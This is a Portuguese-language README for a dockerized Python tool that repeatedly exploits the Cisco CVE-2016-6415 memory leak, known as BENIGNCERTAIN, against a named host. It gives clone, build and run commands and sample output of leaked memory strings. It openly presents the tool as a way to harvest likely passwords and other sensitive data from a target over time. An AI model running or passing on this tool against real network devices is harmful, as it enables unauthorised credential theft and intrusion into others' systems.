
Reimplementação do benigncertain-monitor da VirtueSecurity
Reimplementação do benigncertain-monitor da VirtueSecurity. Não tem todas as mesmas opções de payload do original, mas substitui o binário bc-id por uma prova de conceito melhor de Ross Bradley que pode ser expandida se necessário.
$ git clone https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor.git
$ cd CVE-2016-6415-BenignCertain-Monitor
$ sudo docker build . -t benign-monitor
$ sudo docker run -it benign-monitor <host>
O serviço irá consultar continuamente o serviço vulnerável, extrair strings ASCII da memória, armazenar as strings em um banco de dados sqlite local e mostrar as strings observadas com mais frequência:
Starting monitor against 10.0.6.1
string count
0 5$dx 3
1 0(0 3
2 $c{l 3
3 (0"t&j 3
4 R$dkd$hf7! 2
5 %d1N=8$i- 2
6 $c)P0 1
7 1NlD 1
8 1NlD' 1
9 $c)P(0 1
10 $c)P1@_ 1
Este é um script Python dockerizado que vaza continuamente a memória de um alvo vulnerável ao exploit BENIGNCERTAIN da NSA para Cisco CVE-2016-6415.
O script consulta o serviço vulnerável ao longo do tempo para identificar prováveis senhas e outras informações potencialmente sensíveis. Isso pode ser usado para coletar dados acionáveis ao longo de um período de tempo, em vez de apenas um exploit de prova de conceito.